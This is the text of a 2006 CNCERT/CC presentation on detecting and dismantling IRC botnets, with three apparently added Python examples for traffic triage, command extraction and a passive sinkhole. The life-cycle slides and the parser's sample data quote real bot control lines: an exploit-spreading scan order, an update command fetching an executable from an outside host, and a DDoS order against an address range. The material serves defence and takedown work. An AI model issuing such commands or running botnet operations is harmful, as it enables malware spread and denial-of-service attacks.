How CNCERT/CC Fights Botnets. Dr. Mingqi CHEN, CNCERT/CC. March 31, 2006, Beijing
Contents
Part 1 New security threats
Part 2 How to detect and handle botnets
Part 3 Fighting botnets: activities
Part 4 Suggestions for cooperation
1 Botnets in China
Background: the Internet in China has 111 million netizens, nearly 694 thousand websites and 136,106 Mbps of international bandwidth (CNNIC, 17th survey, as of Dec 31, 2005).
New threats: phishing, spyware, botnets
Phishing: top 3 hosting countries: U.S. 34.67%, Korea 9.83%, China 8.98%
Spyware in China, Oct 9 - Dec 31, 2005: for 30+ spyware families, 700,000+ infected hosts in mainland China
What they do:
-collect information and send it back to their servers
-fetch keywords from the servers
-download files from the servers
Control servers:
-mostly in foreign countries
-for example: U.S. 42, Korea 26
Selling Zombies Online
Providing DDoS Attack Service
"DDoS Attack Service!" price list, as advertised:
-no firewall: 100 RMB/hour
-100M hardware firewall: 300 RMB/hour
-1000M hardware firewall: 600 RMB/hour
-10,000+ "chickens" (underground slang for zombie hosts) guaranteed
Botnets detected in 2005
[Chart: number of botnets detected in 2005 (each with more than 1,000 infected hosts), by scale. Bins 1k-10k, 10k-30k, 30k-50k, 50k-100k and >100k infected hosts; bar values 111, 78, 14, 2 and 1 respectively.]
-143 botnets had more than 5,000 infected hosts
-biggest: 157,142 infected hosts
What are they doing?
2 How to detect and handle botnets
Network structure of a botnet: IRC based (the bots connect to an IRC server and join a control channel; the controller issues commands to all of them through that channel)
Methods to detect botnets
1 Honeynet (honeypot/honeywall): log analysis + bot sample analysis (Honeynet Project)
2 IDS + IRC protocol analysis (863-917 NetSec Monitoring Platform)
3 Bot behaviour: bots join quickly, keep long-standing connections and are not talkative (DDoSVax project)
Comparison of detection methods for IRC botnets
Method        | Scope and bot type                                                        | Information type                                                          | Information granularity
Honeypot      | bots that reach the sensor and are able to infect and propagate           | every message the bot receives or sends                                   | very fine, but limited to what the bot itself sends and receives
IRC protocol  | bots active within the monitored range                                    | network traffic matching the known (IRC) protocol monitoring conditions   | overall picture plus some specific commands; e.g. it reveals the exchange between the controller and the control server, but lacks the message payload
Bot behaviour | larger botnets within the monitored range that strictly use the IRC protocol | not suited to collecting specific information                          | overall picture only; not suited to collecting specific information
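The behavioural method (item 3 above, last row of the table) can be turned into a small triage script. The following is an added example, not code from CNCERT/CC, the 863-917 platform or the DDoSVax project: it scores every (server, channel) pair on the three signs using per-session records of the kind an IRC-aware flow monitor could export. The record layout, the thresholds and the sample sessions are constructed for illustration.

```python
"""Behaviour-based triage of IRC channels for botnet activity.

Added example; it is not code from CNCERT/CC, the 863-917 platform or the
DDoSVax project. It applies the three behavioural signs on the slide (fast
joining, long-standing connections, not talkative) to per-session records
of the kind an IRC-aware flow monitor could export. The record layout, the
thresholds and the sample sessions are constructed for illustration.
"""
from collections import defaultdict
from dataclasses import dataclass
from statistics import median
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class IrcSession:
    client: str      # address of the host that connected
    server: str      # IRC server it connected to
    channel: str     # channel it joined
    join_at: int     # time of the JOIN, seconds since the epoch
    duration_s: int  # how long the TCP connection stayed up, in seconds
    msgs_sent: int   # PRIVMSG/NOTICE lines the client sent


# Thresholds (assumed values; a real deployment tunes them per network)
JOIN_WINDOW_S = 60                # joins are counted inside a sliding window
MIN_BURST_JOINS = 20              # "fast joining": this many joins in one window
MIN_MEDIAN_DURATION_S = 6 * 3600  # "long standing": median session of 6 h or more
MAX_MSGS_PER_HOUR = 1.0           # "not talkative": at most one line per client-hour


def max_joins_in_window(join_times: List[int], window_s: int) -> int:
    """Largest number of joins that fall inside any window_s-second interval."""
    times = sorted(join_times)
    best = lo = 0
    for hi in range(len(times)):
        while times[hi] - times[lo] > window_s:
            lo += 1
        best = max(best, hi - lo + 1)
    return best


def channel_metrics(sessions: List[IrcSession]) -> Dict[str, float]:
    client_hours = sum(s.duration_s for s in sessions) / 3600
    msgs = sum(s.msgs_sent for s in sessions)
    return {
        "clients": len({s.client for s in sessions}),
        "burst_joins": max_joins_in_window([s.join_at for s in sessions], JOIN_WINDOW_S),
        "median_duration_s": median(s.duration_s for s in sessions),
        # zero connection time would divide by zero; treat it as "talkative"
        # so a channel of instant disconnects is never flagged on this sign
        "msgs_per_hour": msgs / client_hours if client_hours else float("inf"),
    }


def channel_flags(metrics: Dict[str, float]) -> Dict[str, bool]:
    return {
        "fast_joining": metrics["burst_joins"] >= MIN_BURST_JOINS,
        "long_standing": metrics["median_duration_s"] >= MIN_MEDIAN_DURATION_S,
        "not_talkative": metrics["msgs_per_hour"] <= MAX_MSGS_PER_HOUR,
    }


def triage(sessions: List[IrcSession]) -> Dict[Tuple[str, str], dict]:
    """Group sessions by (server, channel); a channel is suspect when all three signs hold."""
    groups = defaultdict(list)
    for s in sessions:
        groups[(s.server, s.channel)].append(s)
    report = {}
    for key, group in groups.items():
        metrics = channel_metrics(group)
        flags = channel_flags(metrics)
        report[key] = {"metrics": metrics, "flags": flags, "suspect": all(flags.values())}
    return report


def sample_sessions() -> List[IrcSession]:
    """Constructed data: a bot channel (40 quiet, long-lived clients joining 2 s apart)
    and an ordinary user channel (12 chatty clients drifting in over two hours)."""
    t0 = 1_127_000_000
    bots = [IrcSession(f"10.0.0.{i + 1}", "irc.example.net", "##asn-new##",
                       t0 + 2 * i, 24 * 3600, 1 if i == 0 else 0) for i in range(40)]
    humans = [IrcSession(f"192.0.2.{i + 1}", "irc.example.net", "#linux",
                         t0 + 600 * i, 1800 + 300 * i, 30) for i in range(12)]
    return bots + humans


if __name__ == "__main__":
    for (server, channel), r in triage(sample_sessions()).items():
        print(f"{server} {channel}: suspect={r['suspect']} flags={r['flags']}")
```

As the table says, behaviour gives the overall picture only: a channel flagged this way still needs protocol-level capture or a honeypot sample before its commands, passwords and controller are known, and the thresholds have to be tuned per network, since a human channel can also be quiet and long-lived overnight.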
Secret Life Cycle of Botnets
1 Botnet creation: by spam / social engineering / websites with malicious code; by bots/worms: Deloder/Mytob/Zotob
2 Botnet spread: TOPIC ##asn-new## :.advscan asn1smb 400 3 0 -r -b s (the channel topic orders every bot that joins to run its advscan module with the asn1smb exploit)
3 Botnet transfer (IRC server transfer): a. physical host transfer; b. logical host transfer (dds); c. host-internal transfer
Secret Life Cycle of Botnets (cont.)
4 Botnet update, by TOPIC or PRIVMSG
-update file: PRIVMSG ##em :!upadfkadf http://w00tage.com/stolen2.exe stolen
-add or remove a module: PRIVMSG #NotaBot :.spread.add.module vnc_scan\r\n (Sep 19, 2005, 02:00)
5 Botnet activity: DDoS / downloading spyware / information stealing / scanning and spreading
-TOPIC ##bla :.ddos.random 81.169.*.* 80 120 // launches a denial-of-service attack (Sep 27, 8 PM)
6 Botnet demise
a. C&C servers no longer available
b. bot cleaned by the user or an AV product
c. .remove/.uninstall issued by the hacker or by others
d. control taken over by other bots
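The commands quoted in stages 2, 4 and 5 are ordinary IRC TOPIC and PRIVMSG text, so an IRC-aware monitor (method 2 above) can extract and classify them. The following is an added example, not code from CNCERT/CC or its monitoring platform: the stage rules, the command vocabulary (modelled on IRC bot families of the period, not a complete list) and the lines of the sample capture that are not quoted on the slides are assumptions.

```python
"""Pulling bot commands out of captured IRC traffic.

Added example; it is not code from CNCERT/CC or its monitoring platform. It
parses raw IRC lines (the TOPIC/PRIVMSG forms shown on the slides and the
332 RPL_TOPIC numeric a joining bot receives), extracts the bot command in
the text and maps it to a life-cycle stage. The stage rules, the command
vocabulary (modelled on common IRC bot families of the period, not a
complete list) and the non-slide lines of the sample capture are constructed.
"""
import re
from dataclasses import dataclass, field
from typing import Iterable, List, Optional

# RFC 1459 shape: [':' prefix ' '] command {' ' middle} [' :' trailing]
IRC_LINE = re.compile(
    r"^(?::(?P<prefix>\S+)\s+)?(?P<cmd>\S+)(?P<middle>(?:\s+(?!:)\S+)*)(?:\s+:(?P<trailing>.*))?$"
)
BOT_PREFIXES = ".!"   # characters bot families use to mark a command
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


@dataclass
class BotCommand:
    channel: str
    sender: Optional[str]   # nick from the line's prefix, when present
    verb: str               # command word without its prefix character
    args: List[str] = field(default_factory=list)
    stage: str = "unknown"
    raw: str = ""


def classify(verb: str, args: List[str]) -> str:
    """Map a bot command to the life-cycle stage it belongs to (order matters)."""
    v = verb.lower()
    if v in ("login", "auth", "secure"):          # controller authenticating itself
        return "controller_auth"
    if v in ("remove", "uninstall", "die"):       # botnet demise
        return "demise"
    if v.startswith(("ddos", "syn", "udp")):      # attack activity
        return "attack"
    if "module" in v or v in ("update", "download") or any(URL_RE.match(a) for a in args):
        return "update"                           # new binary or module, however the verb is spelled
    if v.startswith(("advscan", "scan", "spread")):
        return "spread"
    return "unknown"


def parse_line(line: str) -> Optional[BotCommand]:
    m = IRC_LINE.match(line.strip())
    if not m:
        return None
    cmd, middle, text = m.group("cmd").upper(), m.group("middle").split(), m.group("trailing")
    # channel text arrives as PRIVMSG/NOTICE/TOPIC <chan> :text, or as
    # ':server 332 <nick> <chan> :topic' when a bot joins and reads the topic
    if cmd in ("PRIVMSG", "NOTICE", "TOPIC") and middle:
        channel = middle[0]
    elif cmd == "332" and len(middle) >= 2:
        channel = middle[1]
    else:
        return None
    if not text or text[0] not in BOT_PREFIXES:
        return None                               # ordinary chat, not a command
    words = text.split()
    verb, args = words[0][1:], words[1:]
    if not verb:
        return None
    sender = m.group("prefix").split("!")[0] if m.group("prefix") else None
    return BotCommand(channel, sender, verb, args, classify(verb, args), line.strip())


def extract_commands(lines: Iterable[str]) -> List[BotCommand]:
    return [c for c in (parse_line(l) for l in lines) if c is not None]


def summarize(cmds: List[BotCommand]) -> dict:
    """Per-channel view: stages seen, update URLs, attack targets and who gave orders."""
    out = {}
    for c in cmds:
        e = out.setdefault(c.channel, {"stages": set(), "urls": set(), "targets": set(), "senders": set()})
        e["stages"].add(c.stage)
        e["urls"].update(a for a in c.args if URL_RE.match(a))
        if c.stage == "attack" and c.args:
            e["targets"].add(c.args[0])
        if c.sender:
            e["senders"].add(c.sender)
    return out


# The first four lines are the ones quoted on the slides; the rest are constructed.
SAMPLE_CAPTURE = [
    "TOPIC ##asn-new## :.advscan asn1smb 400 3 0 -r -b s",
    "PRIVMSG ##em :!upadfkadf http://w00tage.com/stolen2.exe stolen",
    "PRIVMSG #NotaBot :.spread.add.module vnc_scan\r\n",
    "TOPIC ##bla :.ddos.random 81.169.*.* 80 120",
    ":ctrl!op@203.0.113.9 PRIVMSG #NotaBot :.login s3cret",
    ":irc.example.net 332 xb0t ##bla :.ddos.random 81.169.*.* 80 120",
    ":alice!a@198.51.100.7 PRIVMSG #linux :has anyone tried the new kernel?",
    ":ctrl!op@203.0.113.9 PRIVMSG #NotaBot :.uninstall",
]

if __name__ == "__main__":
    for c in extract_commands(SAMPLE_CAPTURE):
        print(f"{c.stage:16} {c.channel:12} {c.sender or '-':6} {c.verb} {' '.join(c.args)}")
```

Besides the stage, the per-channel summary recovers several of the preconditions listed in Part 3: the channel names, the update-file host, the attack targets and the nick that issued the login command. The obfuscated verb in the update line is classified by the URL it carries rather than by its name, which is the one robust signal when a family renames its commands.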
3 Preconditions for Handling Botnets
As Sun Tzu says: 知己知彼，百战不殆 ("Know the enemy and know yourself, and you can fight a hundred battles with no danger of defeat", The Art of War)
C&C server info: DNS name/IP, port, access password (if any)
Channel info: name, access password (if any), control password
Coding rules: controller identity authentication (login password); the coding rules and the controller's identity are embedded in the bot
Command set supported by the bot: authentication, update and self-delete commands, e.g. login, update, download, uninstall
Botnets handling
1 Take control of the whole botnet ("to catch the bandits, first catch the ringleader": impersonate the controller and take full control of the botnet)
Final solution: analyse the bot code; locate the C&C server, with authorisation or the consent of its owner; send a false update command (a "poison pill"); send the self-delete command ("collective suicide")
Precondition: obtain the controller's authentication information
2 Cut the communication channel between the zombies and the C&C server ("take the firewood from under the cauldron": sever the link between the users' hosts and the control server)
-block the C&C server at the LAN boundary; condition: accurate information about the C&C server
-cancel the domain name so that it no longer resolves; condition: authorisation
3 Clean the bots and patch the systems ("to resist the enemy outside, first pacify the inside": remove the bot program from the users' endpoints and apply patches)
-by the user: manual removal
-by AV products: dedicated removal tools or updated antivirus
Our actions
1. Keep detecting botnets through our 863-917 platform (since Dec 2004)
2. Exchange botnet data, especially on C&C servers, from our partners and from other CERT teams
3. With the help of local branches and ISPs, and with the consent of the owner of the host running the C&C server, shut the C&C server down
4. Through the information-sharing channel, inform the owners of zombie hosts and provide cleaning tools for some botnets
5. Share bot code and analysis results
6. Proactively work with all relevant departments to punish the criminal behaviour of creating, spreading and using malicious bots
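Items 3 and 4 above (shutting down the C&C server, then informing the owners of the zombies) and the domain-name measure in the handling slide fit together: once the C&C domain resolves, with the required authorisation, to a defender-run host instead of the original server, every bot that reconnects identifies itself. The sinkhole below is an added example, not CNCERT/CC code or procedure; the class names, the replies it sends and the bot transcript in run_demo() are assumptions.

```python
"""IRC sinkhole that enumerates the zombies of a shut-down C&C server.

Added example, not CNCERT/CC code or procedure. After the C&C host is shut
down and its domain name is pointed, with authorisation, at a defender-run
host, the bots keep reconnecting there. This sinkhole speaks just enough IRC
to keep a bot connected (001 welcome, PING/PONG, JOIN echo) while recording
each client's source address, nick, user, channel and channel key: the list
of unaware victims to notify. It never sends a command. The protocol core is
a pure byte-stream handler so it runs offline; the transcript in run_demo()
is constructed.
"""
import socketserver
import time
from typing import Dict, List


class SinkholeSession:
    """Per-connection state: feed() takes received bytes, returns bytes to send back."""

    def __init__(self, peer_ip: str):
        self.record: dict = {"ip": peer_ip, "nick": None, "user": None,
                             "channels": [], "first_seen": time.time()}
        self._buf = b""
        self._welcomed = False

    def feed(self, data: bytes) -> bytes:
        self._buf += data                      # lines may be split across reads
        out = b""
        while b"\n" in self._buf:
            line, self._buf = self._buf.split(b"\n", 1)
            out += self._handle(line.rstrip(b"\r").decode("utf-8", "replace"))
        return out

    def _handle(self, line: str) -> bytes:
        parts = line.split()
        if not parts:
            return b""
        verb, args = parts[0].upper(), parts[1:]
        if verb == "NICK" and args:
            self.record["nick"] = args[0]
        elif verb == "USER" and args:
            self.record["user"] = args[0]
        elif verb == "JOIN" and args:          # JOIN #a,#b [key]
            for chan in args[0].split(","):
                if chan not in self.record["channels"]:
                    self.record["channels"].append(chan)
            if len(args) > 1:
                self.record["channel_key"] = args[1]   # channel password the bot carries
            return f":{self.record['nick'] or '*'} JOIN :{args[0]}\r\n".encode()
        elif verb == "PING":
            return f"PONG :{args[0].lstrip(':') if args else 'sinkhole'}\r\n".encode()
        # 001 once NICK and USER are both in; a real bot then JOINs and reveals its channel
        if not self._welcomed and self.record["nick"] and self.record["user"]:
            self._welcomed = True
            return f":sinkhole 001 {self.record['nick']} :Welcome\r\n".encode()
        return b""


class Sinkhole:
    """Registry of every client seen."""

    def __init__(self):
        self.sessions: List[SinkholeSession] = []

    def new_session(self, peer_ip: str) -> SinkholeSession:
        self.sessions.append(SinkholeSession(peer_ip))
        return self.sessions[-1]

    def victims(self) -> List[dict]:
        """One record per distinct source IP, the list handed to ISPs for notification."""
        by_ip: Dict[str, dict] = {}
        for s in self.sessions:
            by_ip.setdefault(s.record["ip"], s.record)
        return sorted(by_ip.values(), key=lambda r: r["ip"])


class _Handler(socketserver.StreamRequestHandler):
    def handle(self):
        session = self.server.sinkhole.new_session(self.client_address[0])
        while True:
            data = self.request.recv(4096)
            if not data:
                break
            reply = session.feed(data)
            if reply:
                self.request.sendall(reply)


def serve(sinkhole: Sinkhole, host: str = "0.0.0.0", port: int = 6667):
    """Bind the listener; the caller runs srv.serve_forever() and later srv.shutdown()."""
    srv = socketserver.ThreadingTCPServer((host, port), _Handler)
    srv.sinkhole = sinkhole
    return srv


def run_demo() -> List[dict]:
    """Replay a constructed bot registration whose JOIN is split across two reads."""
    sink = Sinkhole()
    bot = sink.new_session("10.0.0.17")
    for chunk in (b"NICK [DEU|XP]48213\r\nUSER xp 0 0 :xp\r\nJOIN ##asn-",
                  b"new## b0tp4ss\r\nPING :sinkhole\r\n"):
        bot.feed(chunk)                        # replies would go back to the bot
    return sink.victims()
```

The sinkhole only listens and answers the minimum a bot needs to stay connected; it deliberately never issues update or uninstall commands, since the "poison pill" and "collective suicide" options in the handling slide change code on hosts whose owners have not consented. The recorded channel key is the channel access password listed among the preconditions, and the per-IP victim list is what item 4 distributes through the information-sharing channel.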
Network Security Drills
Dec 20, 2005: MII and all backbone carriers in China took part; the Deputy Minister of MII and 50+ officials attended
Two scenarios:
-critical infrastructure attacked by hackers
-DDoS attack driven by botnets
Dec 21, 2005: APCERT security drill
Incident Classification Standard
Guidelines for Classification of Information Security Incidents (draft stage):
- making and spreading bots/Trojans/worms/viruses/other malicious code
- mass PII incident (proposed)
Typical Cases of CNCERT/CC
- In Dec 2004, CNCERT/CC detected and broke down an IRC botnet of 170,000+ hosts that was used for a DDoS attack (the figure reported in the media was 60,000 hosts; reported last year)
- Aug 19, 2005: CNCERT/CC found a botnet of 150,000+ hosts and found clues to the hackers: a user with the nickname gunit had logged into the network and sent control commands to several channels, ordering scans for a particular vulnerability (Aug 29, 2005)
- Oct 17, 2005: W32/Toxbot incident, 290,000+ hosts, reported by SURFnet
4 Suggestions (CERT level)
1 Malicious code sharing and analysis
2 Botnet elimination: exchange C&C server and client information; cooperate to break down botnets
3 Information sharing: information on unaware victims
No safe homeland without safe neighbors! Thanks! http://www.cert.org.cn cmq@cert.org.cn